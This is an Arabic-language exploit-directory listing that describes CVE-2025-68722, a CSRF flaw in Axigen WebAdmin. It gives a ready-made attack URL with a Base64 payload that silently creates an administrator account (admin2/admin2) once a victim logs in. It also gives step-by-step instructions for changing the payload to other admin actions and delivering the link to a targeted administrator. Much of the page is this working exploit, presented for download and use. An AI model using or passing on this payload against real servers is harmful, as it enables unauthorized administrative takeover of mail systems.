Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-68722 — Axigen WebAdmin CSRF Vulnerability | Kitploit
أدوات/GitHubGitHub/osmancanvural/cve-2025-68722
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubosmancanvural/cve-2025-68722

CVE-2025-68722

Axigen WebAdmin CSRF Vulnerability

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-68722: Axigen WebAdmin CSRF

ملخص الثغرة

إجراءات تغيير الحالة الحرجة في واجهة Axigen WebAdmin يمكن الوصول إليها عبر طلبات GET. بينما يوفّر رمز _h الحماية ضد CSRF المباشر، يقوم التطبيق بمعالجة الطلبات المجدولة عبر معامل _s (مسار التنقل) فورًا بعد مصادقة المستخدم.

يمكن للمهاجم إنشاء رابط يحتوي على حمولة مشفّرة بـ Base64 في معامل _s. إذا نقر مسؤول على هذا الرابط وأكمل عملية تسجيل الدخول، فسيتم تنفيذ الإجراء المجدول تلقائيًا في سياق صلاحياته.

الإصدارات المتأثرة: أقل من 10.6.26

لمزيد من المعلومات، راجع قاعدة معرفة Axigen.


إثبات الفكرة (POC)

رابط الهدف: https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19

الحمولة المفكوكة (معامل _s):

root@kitploit:~
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}

خطوات إعادة الإنتاج:

  1. التعديل: غيّر حمولة JSON لاستهداف إجراءات إدارية مختلفة (مثل تغيير إعدادات الخادم).
  2. الترميز: أعد ترميز JSON المعدّل إلى Base64.
  3. التسليم: استبدل قيمة معامل _s في رابط الهجوم وسلّمه إلى مسؤول مستهدف.
  4. التفعيل: عند تسجيل الدخول عبر هذا الرابط، يتم إنشاء حساب admin2 (أو تنفيذ الإجراء المخصص لديك).

تنزيل الأداة